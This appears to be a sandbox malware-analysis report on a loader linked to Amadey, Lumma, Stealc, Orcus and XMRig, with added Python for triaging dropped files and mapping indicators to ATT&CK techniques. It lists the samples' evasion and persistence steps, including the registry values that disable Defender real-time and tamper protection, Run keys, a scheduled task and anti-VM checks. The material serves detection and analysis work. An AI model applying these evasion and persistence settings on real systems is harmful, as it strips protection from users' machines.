memory/2808-452-0x0000000000B00000-0x0000000000FAF000-memory.dmp

memory/2820-453-0x0000000000400000-0x0000000000C62000-memory.dmp

memory/2808-454-0x0000000000B00000-0x0000000000FAF000-memory.dmp

memory/2820-455-0x0000000000400000-0x0000000000C62000-memory.dmp

memory/2808-456-0x0000000000B00000-0x0000000000FAF000-memory.dmp

memory/2820-457-0x0000000000400000-0x0000000000C62000-memory.dmp
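One check worth running on the listing above: the `skotes.exe` copy under `Temp\abc3bc1985\` carries the same SHA256 as the submitted sample, so it is the loader re-dropping itself under a new name rather than a new payload, whereas the `.exe` files under the numbered `Temp\1012589001\` to `Temp\1012593001\` directories are downloaded second stages, and the Firefox profile files are the sandbox browser's own writes. The Python below is an added example, not part of the report, that parses the listing into that split and collects the PIDs for which memory regions were dumped. The numbered-directory pattern (`PAYLOAD_RE`) is an assumption taken from the paths seen here; the sample listing is a subset copied from above with the SHA512 lines omitted.

```python
from __future__ import annotations
import re
from dataclasses import dataclass, field
from typing import Dict, List, Tuple

# SHA256 of the submitted sample, from the report header.
SUBMITTED_SHA256 = "ca2d328cf8d3bb990c47a4ea62d67eff34f06a00b7a3a7bf5189120da96d8bc4"

# Constructed sample: entries copied from the file listing above (SHA512 lines omitted).
SAMPLE_LISTING = r"""
memory/3020-0-0x0000000000A80000-0x0000000000F2F000-memory.dmp

memory/2808-21-0x0000000000B00000-0x0000000000FAF000-memory.dmp

\Users\Admin\AppData\Local\Temp\abc3bc1985\skotes.exe

MD5 f25ddb78a2cc3b6442c52a3c4a2aa843
SHA1 52ba6df84b158bf917044fee22625d2a12202382
SHA256 ca2d328cf8d3bb990c47a4ea62d67eff34f06a00b7a3a7bf5189120da96d8bc4

C:\Users\Admin\AppData\Local\Temp\1012589001\3b61988b61.exe

MD5 623d073b8d01e00cbb5294ff07fe238a
SHA1 c3aeeb4de6cd38209944e7a1c3ecaa3f411f8775
SHA256 ce50862f51244b9dce6dbde2bc96fa852cff8ca84b720797894a3f43f4e293ca

C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\5nwvfgbl.default-release\prefs.js

MD5 b182349cdb981b524cc45a1945f61b5f
SHA1 f1b943220cd1f2ff7b423f14aecd3fb1a4c8810e
SHA256 e65a7bf35918530919cba715b96521343c7d5410ffe2634170ae46c1f9954803

C:\Users\Admin\AppData\Local\Temp\Cab16BE.tmp

MD5 49aebf8cbd62d92ac215b2923fb1b9f5
SHA1 1723be06719828dda65ad804298d0431f6aff976
SHA256 b33efcb95235b98b48508e019afa4b7655e80cf071defabd8b2123fc8b29307f
"""

PATH_RE = re.compile(r"^(?:[A-Za-z]:)?\\")           # '\Users\...' or 'C:\...'
HASH_RE = re.compile(r"^(MD5|SHA1|SHA256|SHA512) ([0-9a-fA-F]+)$")
MEMDUMP_RE = re.compile(r"^memory/(\d+)-")            # memory/<pid>-<n>-<range>-memory.dmp
# Assumption: the loader's numbered download directories, as laid out in this listing.
PAYLOAD_RE = re.compile(r"\\Temp\\\d{10}\\[0-9a-f]{10}\.exe$", re.I)
BROWSER_PROFILE = "\\Mozilla\\Firefox\\Profiles\\"

@dataclass
class FileEntry:
    path: str
    hashes: Dict[str, str] = field(default_factory=dict)

def parse_listing(text: str) -> Tuple[List[FileEntry], List[int]]:
    """Return (file entries with their hashes, sorted PIDs that had memory regions dumped)."""
    entries: List[FileEntry] = []
    pids = set()
    for line in text.splitlines():
        line = line.strip()
        if not line:
            continue
        m = MEMDUMP_RE.match(line)
        if m:
            pids.add(int(m.group(1)))
            continue
        m = HASH_RE.match(line)
        if m:
            if not entries:
                raise ValueError("hash line before any file path: %r" % line)
            entries[-1].hashes[m.group(1)] = m.group(2).lower()
            continue
        if PATH_RE.match(line):
            entries.append(FileEntry(line))
            continue
        raise ValueError("unrecognised line: %r" % line)
    return entries, sorted(pids)

def triage_files(text: str, submitted_sha256: str) -> Dict[str, object]:
    """Separate the loader's self-copy and payload drops from browser-profile noise."""
    entries, pids = parse_listing(text)
    out: Dict[str, object] = {"self_copies": [], "payload_sha256": [], "browser_noise": 0,
                              "other": [], "dumped_pids": pids}
    for e in entries:
        sha = e.hashes.get("SHA256", "")
        if sha == submitted_sha256.lower():
            out["self_copies"].append(e.path)     # the sample re-dropped under a new name
        elif PAYLOAD_RE.search(e.path):
            out["payload_sha256"].append(sha)     # a downloaded second stage to blocklist
        elif BROWSER_PROFILE in e.path:
            out["browser_noise"] += 1             # Firefox writing its own profile
        else:
            out["other"].append(e.path)           # review by hand (Cab/Tar temp files etc.)
    out["payload_sha256"].sort()
    return out

if __name__ == "__main__":
    print(triage_files(SAMPLE_LISTING, SUBMITTED_SHA256))
```

The self-copy check is the one that matters for blocklists: the SHA256 of `skotes.exe` adds nothing beyond the submitted sample's hash, while the hashes under the numbered directories are the ones the earlier dropped files in this report do not already cover.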

Analysis: behavioral2

Detonation Overview

Submitted

2024-12-06 03:17

Reported

2024-12-06 03:20

Platform

win10v2004-20241007-en

Max time kernel

133s

Max time network

156s

Command Line

C:\Windows\Explorer.EXE

Signatures

Amadey

trojan amadey

Amadey family

amadey

GCleaner

loader gcleaner

Gcleaner family

gcleaner

Lumma Stealer, LummaC

stealer lumma

Lumma family

lumma

Modifies Windows Defender Real-time Protection settings

evasion trojan
Description Indicator Process Target
Set value (int) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableRealtimeMonitoring = "1" C:\Users\Admin\AppData\Local\Temp\1012593001\8f8b7f7520.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableScanOnRealtimeEnable = "1" C:\Users\Admin\AppData\Local\Temp\1012593001\8f8b7f7520.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Policies\Microsoft\Windows Defender\Real-Time Protection C:\Users\Admin\AppData\Local\Temp\1012593001\8f8b7f7520.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableBehaviorMonitoring = "1" C:\Users\Admin\AppData\Local\Temp\1012593001\8f8b7f7520.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableIOAVProtection = "1" C:\Users\Admin\AppData\Local\Temp\1012593001\8f8b7f7520.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableOnAccessProtection = "1" C:\Users\Admin\AppData\Local\Temp\1012593001\8f8b7f7520.exe N/A

Orcus

rat spyware stealer orcus

Orcus family

orcus

Stealc

stealer stealc

Stealc family

stealc

Suspicious use of NtCreateUserProcessOtherParentProcess

Description Indicator Process Target
PID 3664 created 3464 N/A C:\Users\Admin\AppData\Local\Temp\491505\Dr.com C:\Windows\Explorer.EXE

TA505

ta505

Ta505 family

ta505

XMRig Miner payload

miner
Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A

Xmrig family

xmrig

xmrig

miner xmrig

Identifies VirtualBox via ACPI registry values (likely anti-VM)

evasion
Description Indicator Process Target
Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ C:\Users\Admin\AppData\Local\Temp\ca2d328cf8d3bb990c47a4ea62d67eff34f06a00b7a3a7bf5189120da96d8bc4.exe N/A
Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ C:\Users\Admin\AppData\Local\Temp\abc3bc1985\skotes.exe N/A
Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ C:\Users\Admin\AppData\Local\Temp\1012589001\d9c5b97a2f.exe N/A
Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ C:\Users\Admin\AppData\Local\Temp\1012590001\628cb6a5aa.exe N/A
Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ C:\Users\Admin\AppData\Local\Temp\1012591001\91f0bbb4f8.exe N/A
Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ C:\Users\Admin\AppData\Local\Temp\abc3bc1985\skotes.exe N/A
Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ C:\Users\Admin\AppData\Local\Temp\1012593001\8f8b7f7520.exe N/A
Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ C:\Users\Admin\AppData\Local\Temp\abc3bc1985\skotes.exe N/A

Orcurs Rat Executable

Description Indicator Process Target
N/A N/A N/A N/A

Downloads MZ/PE file

Checks BIOS information in registry

Description Indicator Process Target
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion C:\Users\Admin\AppData\Local\Temp\ca2d328cf8d3bb990c47a4ea62d67eff34f06a00b7a3a7bf5189120da96d8bc4.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion C:\Users\Admin\AppData\Local\Temp\1012589001\d9c5b97a2f.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion C:\Users\Admin\AppData\Local\Temp\1012591001\91f0bbb4f8.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion C:\Users\Admin\AppData\Local\Temp\abc3bc1985\skotes.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion C:\Users\Admin\AppData\Local\Temp\1012593001\8f8b7f7520.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion C:\Users\Admin\AppData\Local\Temp\1012593001\8f8b7f7520.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion C:\Users\Admin\AppData\Local\Temp\abc3bc1985\skotes.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion C:\Users\Admin\AppData\Local\Temp\abc3bc1985\skotes.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion C:\Users\Admin\AppData\Local\Temp\ca2d328cf8d3bb990c47a4ea62d67eff34f06a00b7a3a7bf5189120da96d8bc4.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion C:\Users\Admin\AppData\Local\Temp\1012589001\d9c5b97a2f.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion C:\Users\Admin\AppData\Local\Temp\1012590001\628cb6a5aa.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion C:\Users\Admin\AppData\Local\Temp\1012590001\628cb6a5aa.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion C:\Users\Admin\AppData\Local\Temp\abc3bc1985\skotes.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion C:\Users\Admin\AppData\Local\Temp\abc3bc1985\skotes.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion C:\Users\Admin\AppData\Local\Temp\1012591001\91f0bbb4f8.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion C:\Users\Admin\AppData\Local\Temp\abc3bc1985\skotes.exe N/A

Checks computer location settings

Description Indicator Process Target
Key value queried \REGISTRY\USER\S-1-5-21-4050598569-1597076380-177084960-1000\Control Panel\International\Geo\Nation C:\Users\Admin\AppData\Local\Temp\ca2d328cf8d3bb990c47a4ea62d67eff34f06a00b7a3a7bf5189120da96d8bc4.exe N/A
Key value queried \REGISTRY\USER\S-1-5-21-4050598569-1597076380-177084960-1000\Control Panel\International\Geo\Nation C:\Users\Admin\AppData\Local\Temp\abc3bc1985\skotes.exe N/A
Key value queried \REGISTRY\USER\S-1-5-21-4050598569-1597076380-177084960-1000\Control Panel\International\Geo\Nation C:\Users\Admin\AppData\Local\Temp\1012475001\wL3EGdM.exe N/A
Key value queried \REGISTRY\USER\S-1-5-21-4050598569-1597076380-177084960-1000\Control Panel\International\Geo\Nation C:\Users\Admin\AppData\Local\Temp\491505\RegAsm.exe N/A

Identifies Wine through registry keys

evasion
Description Indicator Process Target
Key opened \REGISTRY\USER\S-1-5-21-4050598569-1597076380-177084960-1000\Software\Wine C:\Users\Admin\AppData\Local\Temp\ca2d328cf8d3bb990c47a4ea62d67eff34f06a00b7a3a7bf5189120da96d8bc4.exe N/A
Key opened \REGISTRY\USER\S-1-5-21-4050598569-1597076380-177084960-1000\Software\Wine C:\Users\Admin\AppData\Local\Temp\abc3bc1985\skotes.exe N/A
Key opened \REGISTRY\USER\S-1-5-21-4050598569-1597076380-177084960-1000\Software\Wine C:\Users\Admin\AppData\Local\Temp\1012589001\d9c5b97a2f.exe N/A
Key opened \REGISTRY\USER\S-1-5-21-4050598569-1597076380-177084960-1000\Software\Wine C:\Users\Admin\AppData\Local\Temp\1012590001\628cb6a5aa.exe N/A
Key opened \REGISTRY\USER\S-1-5-21-4050598569-1597076380-177084960-1000\Software\Wine C:\Users\Admin\AppData\Local\Temp\1012591001\91f0bbb4f8.exe N/A
Key opened \REGISTRY\USER\S-1-5-21-4050598569-1597076380-177084960-1000\Software\Wine C:\Users\Admin\AppData\Local\Temp\abc3bc1985\skotes.exe N/A
Key opened \REGISTRY\USER\S-1-5-21-4050598569-1597076380-177084960-1000\Software\Wine C:\Users\Admin\AppData\Local\Temp\1012593001\8f8b7f7520.exe N/A
Key opened \REGISTRY\USER\S-1-5-21-4050598569-1597076380-177084960-1000\Software\Wine C:\Users\Admin\AppData\Local\Temp\abc3bc1985\skotes.exe N/A

Windows security modification

evasion trojan
Description Indicator Process Target
Key created \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows Defender\Features C:\Users\Admin\AppData\Local\Temp\1012593001\8f8b7f7520.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows Defender\Features\TamperProtection = "0" C:\Users\Admin\AppData\Local\Temp\1012593001\8f8b7f7520.exe N/A

Adds Run key to start application

persistence
Description Indicator Process Target
Set value (str) \REGISTRY\USER\S-1-5-21-4050598569-1597076380-177084960-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\628cb6a5aa.exe = "C:\\Users\\Admin\\AppData\\Local\\Temp\\1012590001\\628cb6a5aa.exe" C:\Users\Admin\AppData\Local\Temp\abc3bc1985\skotes.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-4050598569-1597076380-177084960-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\91f0bbb4f8.exe = "C:\\Users\\Admin\\AppData\\Local\\Temp\\1012591001\\91f0bbb4f8.exe" C:\Users\Admin\AppData\Local\Temp\abc3bc1985\skotes.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-4050598569-1597076380-177084960-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\b9edc67fa3.exe = "C:\\Users\\Admin\\AppData\\Local\\Temp\\1012592001\\b9edc67fa3.exe" C:\Users\Admin\AppData\Local\Temp\abc3bc1985\skotes.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-4050598569-1597076380-177084960-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\8f8b7f7520.exe = "C:\\Users\\Admin\\AppData\\Local\\Temp\\1012593001\\8f8b7f7520.exe" C:\Users\Admin\AppData\Local\Temp\abc3bc1985\skotes.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-4050598569-1597076380-177084960-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\SmartScreen = "C:\\Users\\Admin\\AppData\\Local\\Temp\\smartscreen.exe" C:\Users\Admin\AppData\Local\Temp\smartscreen.exe N/A

Looks up external IP address via web service

Description Indicator Process Target
N/A api.ipify.org N/A N/A
N/A api.ipify.org N/A N/A

AutoIT Executable

Description Indicator Process Target
N/A N/A N/A N/A

Enumerates processes with tasklist

discovery
Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\tasklist.exe N/A
N/A N/A C:\Windows\SysWOW64\tasklist.exe N/A

Drops file in Windows directory

Description Indicator Process Target
File created C:\Windows\Tasks\skotes.job C:\Users\Admin\AppData\Local\Temp\ca2d328cf8d3bb990c47a4ea62d67eff34f06a00b7a3a7bf5189120da96d8bc4.exe N/A
File opened for modification C:\Windows\MovieArchives C:\Users\Admin\AppData\Local\Temp\1012475001\wL3EGdM.exe N/A
File opened for modification C:\Windows\PackageExpression C:\Users\Admin\AppData\Local\Temp\1012475001\wL3EGdM.exe N/A

Enumerates physical storage devices

System Location Discovery: System Language Discovery

discovery
Description Indicator Process Target
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\taskkill.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\taskkill.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Nls\Language C:\Users\Admin\AppData\Local\Temp\1012592001\b9edc67fa3.exe N/A
Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Nls\Language\InstallLanguage C:\Users\Admin\AppData\Local\Temp\1012592001\b9edc67fa3.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\taskkill.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\taskkill.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\net1.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\abc3bc1985\skotes.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\tasklist.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\net.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\tasklist.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\findstr.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\choice.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\schtasks.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\1012593001\8f8b7f7520.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\net.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\1012589001\d9c5b97a2f.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\1012592001\b9edc67fa3.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\schtasks.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\taskkill.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\ca2d328cf8d3bb990c47a4ea62d67eff34f06a00b7a3a7bf5189120da96d8bc4.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\491505\Dr.com N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\1012591001\91f0bbb4f8.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\net1.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\1012590001\628cb6a5aa.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\491505\RegAsm.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\1012475001\wL3EGdM.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\findstr.exe N/A
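The registry and file rows in the signature tables above (the Defender Real-Time Protection policy values and TamperProtection, the VBOX__ ACPI key, the BIOS version strings, the Wine key, Geo\Nation, the Run keys, skotes.job and NLS\Language) are individual observations; to turn them into a per-process picture you have to parse the `Description Indicator Process Target` rows and map each indicator to a technique. The Python below is an added example, not part of the report and not the sandbox's own rule set: `parse_row` splits a row as printed above, and `RULES` maps indicators to ATT&CK technique ids under the assumptions stated in the comments. The sample rows are copied from the tables above. Note that the NLS\Language rule also fires for `taskkill.exe`, `cmd.exe` and the other system binaries the sample spawned, which is why the summary is keyed by process image rather than reported as a flat count.

```python
from __future__ import annotations
import re
from collections import defaultdict
from dataclasses import dataclass
from typing import Dict, List, Optional

# Constructed sample: one row per technique, copied from the signature tables above.
SAMPLE_ROWS = r"""
Set value (int) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableRealtimeMonitoring = "1" C:\Users\Admin\AppData\Local\Temp\1012593001\8f8b7f7520.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows Defender\Features\TamperProtection = "0" C:\Users\Admin\AppData\Local\Temp\1012593001\8f8b7f7520.exe N/A
Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ C:\Users\Admin\AppData\Local\Temp\abc3bc1985\skotes.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion C:\Users\Admin\AppData\Local\Temp\abc3bc1985\skotes.exe N/A
Key opened \REGISTRY\USER\S-1-5-21-4050598569-1597076380-177084960-1000\Software\Wine C:\Users\Admin\AppData\Local\Temp\abc3bc1985\skotes.exe N/A
Key value queried \REGISTRY\USER\S-1-5-21-4050598569-1597076380-177084960-1000\Control Panel\International\Geo\Nation C:\Users\Admin\AppData\Local\Temp\ca2d328cf8d3bb990c47a4ea62d67eff34f06a00b7a3a7bf5189120da96d8bc4.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-4050598569-1597076380-177084960-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\628cb6a5aa.exe = "C:\\Users\\Admin\\AppData\\Local\\Temp\\1012590001\\628cb6a5aa.exe" C:\Users\Admin\AppData\Local\Temp\abc3bc1985\skotes.exe N/A
File created C:\Windows\Tasks\skotes.job C:\Users\Admin\AppData\Local\Temp\ca2d328cf8d3bb990c47a4ea62d67eff34f06a00b7a3a7bf5189120da96d8bc4.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\taskkill.exe N/A
Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Nls\Language\InstallLanguage C:\Users\Admin\AppData\Local\Temp\1012592001\b9edc67fa3.exe N/A
"""

# Row descriptions used by the report, longest first so prefix matching is unambiguous.
OPS = sorted(("Set value (int)", "Set value (str)", "Key opened", "Key created",
              "Key value queried", "File created", "File opened for modification"),
             key=len, reverse=True)
SPLIT_AT_PATH = re.compile(r" (?=C:\\)")  # a space directly followed by a drive path

@dataclass
class Event:
    op: str
    indicator: str
    process: str
    target: str

    @property
    def key(self) -> str:       # registry key or file path, without any '= value'
        return self.indicator.split(" = ", 1)[0]

    @property
    def value(self) -> Optional[str]:
        parts = self.indicator.split(" = ", 1)
        return parts[1].strip('"') if len(parts) == 2 else None

    @property
    def name(self) -> str:      # last path component (value name or file name)
        return self.key.rsplit("\\", 1)[-1]

    @property
    def image(self) -> str:     # acting process, image name only
        return self.process.rsplit("\\", 1)[-1]

def parse_row(line: str) -> Event:
    """Split '<Description> <Indicator> <Process> <Target>' as printed in the report."""
    line = line.strip()
    op, rest = "other", line
    for candidate in OPS:
        if line.startswith(candidate + " "):
            op, rest = candidate, line[len(candidate) + 1:]
            break
    parts = SPLIT_AT_PATH.split(rest)  # indicator, then process, then target if it is a path
    indicator, process, target = parts[0], "", ""
    if len(parts) >= 3:                # target is itself a path, e.g. Explorer.EXE
        process, target = parts[1], parts[2]
    elif len(parts) == 2:
        tail = parts[1]
        process, target = (tail[:-4], "N/A") if tail.endswith(" N/A") else (tail, "")
    return Event(op, indicator, process, target)

def _defender_disabled(e: Event) -> bool:
    """Policy 'Disable*' values set to 1, or Features\\TamperProtection set to 0."""
    if not e.op.startswith("Set value"):
        return False
    if "\\Policies\\Microsoft\\Windows Defender\\" in e.key and e.name.startswith("Disable"):
        return e.value == "1"
    return e.key.endswith("\\Windows Defender\\Features\\TamperProtection") and e.value == "0"

VM_MARKERS = ("\\acpi\\dsdt\\vbox__", "\\systembiosversion", "\\videobiosversion", "\\software\\wine")

# (ATT&CK technique id, predicate). The mapping is this example's assumption, not the sandbox's.
RULES = [
    ("T1562.001", _defender_disabled),                                       # Impair Defenses
    ("T1547.001", lambda e: e.op.startswith("Set value") and "\\CurrentVersion\\Run\\" in e.key),
    ("T1053.005", lambda e: e.op == "File created"
                  and re.search(r"\\Windows\\Tasks\\[^\\]+\.job$", e.indicator, re.I) is not None),
    ("T1497.001", lambda e: any(m in e.key.lower() for m in VM_MARKERS)),   # VM/sandbox checks
    ("T1614",     lambda e: e.key.endswith("\\Control Panel\\International\\Geo\\Nation")),
    ("T1614.001", lambda e: "\\control\\nls\\language" in e.key.lower()),
]

def classify(text: str) -> List[tuple]:
    """(technique id, process image, indicator) for every row that matches a rule."""
    hits = []
    for line in text.splitlines():
        if line.strip():
            e = parse_row(line)
            hits.extend((tid, e.image, e.indicator) for tid, pred in RULES if pred(e))
    return hits

def summarize(text: str) -> Dict[str, List[str]]:
    """Technique ids per process image; a binary that only hits T1614.001 is usually noise."""
    by_image: Dict[str, set] = defaultdict(set)
    for tid, image, _ in classify(text):
        by_image[image].add(tid)
    return {img: sorted(tids) for img, tids in by_image.items()}

if __name__ == "__main__":
    for image, tids in summarize(SAMPLE_ROWS).items():
        print(image, tids)
```

On the sample rows the summary attributes the Defender tampering to `8f8b7f7520.exe` alone, the anti-VM checks and Run-key persistence to `skotes.exe`, and the task job plus Geo\Nation lookup to the submitted executable, while `taskkill.exe` surfaces only on the language check; that per-image split is what makes the evasion and persistence rows above actionable as detection content.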

Checks processor information in registry

Description Indicator Process Target
Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 C:\Program Files\Mozilla Firefox\firefox.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~Mhz C:\Program Files\Mozilla Firefox\firefox.exe N/A
Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 C:\Program Files\Mozilla Firefox\firefox.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Update Signature C:\Program Files\Mozilla Firefox\firefox.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Update Revision C:\Program Files\Mozilla Firefox\firefox.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\VendorIdentifier C:\Program Files\Mozilla Firefox\firefox.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~Mhz C:\Program Files\Mozilla Firefox\firefox.exe N/A
